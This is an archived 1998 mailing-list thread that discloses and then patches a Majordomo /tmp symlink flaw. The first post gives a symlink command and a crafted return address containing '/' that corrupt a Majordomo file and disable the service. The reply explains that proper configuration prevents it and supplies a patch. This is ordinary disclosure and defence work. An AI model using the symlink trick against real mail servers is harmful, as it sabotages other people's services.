Date:         Thu, 26 Mar 1998 15:03:28 -0600
From:         Karl G - NOC Admin <ovrneith@TQGNET.COM>
Subject:      Majordomo /tmp exploit

-=desc=-
Majordomo allows appending to any file owned by the majordomo user/group.

-=x-ploit=-
create a symlink in /tmp to any majordomo file
ex: ln -s /usr/lib/majordomo/majordomo /tmp/majordomo.debug

send a message with any emailer to majordomo with a "/" in the return
address. (i tested with Winbloze Internet Mail)
ex: blah/1234@yourdomain.com

the owner of majordomo will receive the below message... from then on,
majordomo will be inoperable.  (if the above symlink is used) Majordomo
keeps a debug log and appends to it every time it crashes with out
checking ownerships of the symlinks.. or for that matter for symlinks at
all.

--snip--
Subject: MAJORDOMO ABORT (mj_majordomo)

--


MAJORDOMO ABORT (mj_majordomo)!!

HOSTILE ADDRESS (no x400 c=) blah/34234@domain.com
--snip--

-=fix=-
should the wrapper not check for such things?


party on.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Karl Grindley
  ICQ: 2660211
  Network Administrator
  TQG Internet Network

-----------------------------------------------------------------------

Date:         Thu, 26 Mar 1998 19:26:37 -0600
From:         Steven Pritchard <steve@SILUG.ORG>
Subject:      Re: Majordomo /tmp exploit

Looking at the latest version of majordomo (1.94.4), it seems the
problem isn't that bad.  A well-configured majordomo is not
vulnerable.  (By "well-configured", I mean where the admin has edited
majordomo.cf to change $TMPDIR to something not world-writable.  If
you haven't done that yet, do it now.)

I did find one case where majordomo doesn't honor the $TMPFILE
variable though.  Apply the following patch to fix it:

-- Cut here --

--- majordomo.pl.orig   Wed Aug 27 09:58:53 1997
+++ majordomo.pl        Thu Mar 26 18:42:29 1998
@@ -324,7 +324,7 @@
 }

 # These are package globals referenced by &setlogfile and &log
-$log_file = "/tmp/log.$$";
+$log_file = "$main'TMPDIR/log.$$";
 $log_host = "UNKNOWN";
 $log_program = "UNKNOWN";
 $log_session = "UNKNOWN";

-- end --

Enjoy.

Steve
--
steve@silug.org           | Linux Users of Central Illinois
(217)698-1694             | Meetings the 4th Tuesday of every month
Steven Pritchard          | http://www.luci.org/ for more info